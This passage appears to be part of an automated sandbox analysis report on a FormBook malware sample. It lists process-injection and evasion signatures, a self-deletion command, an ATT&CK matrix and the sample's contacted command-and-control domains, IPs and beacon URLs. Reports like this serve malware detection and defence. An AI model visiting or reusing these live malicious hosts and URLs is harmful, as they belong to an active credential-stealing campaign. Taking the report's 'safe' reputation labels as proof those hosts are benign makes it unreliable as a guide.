      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B84015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B84015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B72073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 199.79.62.169 80
      Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exeNetwork Connect: 18.189.205.91 80
      Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.102 80
      Source: C:\Windows\explorer.exeNetwork Connect: 103.28.36.171 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\211094.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\211094.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\211094.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\211094.exeThread register set: target process: 3440
      Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3440
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\211094.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\211094.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: B70000
      Source: C:\Users\user\Desktop\211094.exeProcess created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp, explorer.exe, 00000006.00000002.599826178.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292F7F cpuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 776, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358423 Sample: 211094.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 29 www.lvlyourlife.com 2->29 31 lvlyourlife.com 2->31 33 www.angelises.com 2->33 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 5 other signatures 2->51 11 211094.exe 1 2->11         started        signatures3 process4 signatures5 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->63 65 Tries to detect Any.run 11->65 67 3 other signatures 11->67 14 211094.exe 6 11->14         started        process6 dnsIp7 41 googlehosted.l.googleusercontent.com 142.250.184.65, 443, 49727 GOOGLEUS United States 14->41 43 doc-0k-78-docs.googleusercontent.com 14->43 69 Modifies the context of a thread in another process (thread injection) 14->69 71 Tries to detect Any.run 14->71 73 Maps a DLL or memory area into another process 14->73 75 3 other signatures 14->75 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 35 td-balancer-dc11-60-102.wixdns.net 185.230.60.102, 49763, 80 WIX_COMIL Israel 18->35 37 africabiocity.com 199.79.62.169, 49760, 80 PUBLIC-DOMAIN-REGISTRYUS United States 18->37 39 22 other IPs or domains 18->39 53 System process connects to network (likely due to code injection or exploit) 18->53 22 explorer.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      211094.exe22%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      4.2.211094.exe.1e7f0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      9.2.explorer.exe.b70000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      9.2.explorer.exe.983ea0.0.unpack100%AviraTR/Dropper.GenDownload File
      9.2.explorer.exe.4fc7960.5.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.azhello.com/iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.lvlyourlife.com/iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.quartiercreole.net/iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.wissinkadams.com/iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.shopping-container.com/iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      https://www.kfs.ltd/iae2?Cb=2Mu6jGWgIoofF63Ti3l%2FZo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCN0%Avira URL Cloudsafe
      http://www.discbrakepart.com/iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.kfs.ltd/iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.africabiocity.com/iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.guidedcommercialloan.com/iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.truckrev.com/iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY0%Avira URL Cloudsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      td-balancer-dc11-60-102.wixdns.net
      		185.230.60.102
      		truetrue
        		unknown
        truckrev.com
        		160.153.136.3
        		truetrue
          		unknown
          parkingpage.namecheap.com
          		198.54.117.211
          		truefalse
            		high
            wissinkadams.com
            		34.98.99.30
            		truetrue
              		unknown
              quartiercreole.net
              		34.102.136.180
              		truetrue
                		unknown
                prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                		18.189.205.91
                		truefalse
                  		high
                  www.angelises.com
                  		162.210.102.231
                  		truefalse
                    		unknown
                    guidedcommercialloan.com
                    		34.102.136.180
                    		truetrue
                      		unknown
                      lvlyourlife.com
                      		34.102.136.180
                      		truetrue
                        		unknown
                        africabiocity.com
                        		199.79.62.169
                        		truetrue
                          		unknown
                          googlehosted.l.googleusercontent.com
                          		142.250.184.65
                          		truefalse
                            		high
                            www.nhadat9chu.com
                            		103.28.36.171
                            		truetrue
                              		unknown
                              discbrakepart.com
                              		34.102.136.180
                              		truetrue
                                		unknown
                                www.azhello.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.shopping-container.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.kfs.ltd
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.lvlyourlife.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.discbrakepart.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.weebflix.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.quartiercreole.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.prepa-tests.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                doc-0k-78-docs.googleusercontent.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.truckrev.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.guidedcommercialloan.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.wissinkadams.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.africabiocity.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.azhello.com/iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.lvlyourlife.com/iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.quartiercreole.net/iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wissinkadams.com/iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shopping-container.com/iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.discbrakepart.com/iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kfs.ltd/iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.africabiocity.com/iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.guidedcommercialloan.com/iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.truckrev.com/iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnYtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000002.588091491.000000000095C000.00000004.00000020.sdmpfalse
                                                            		high
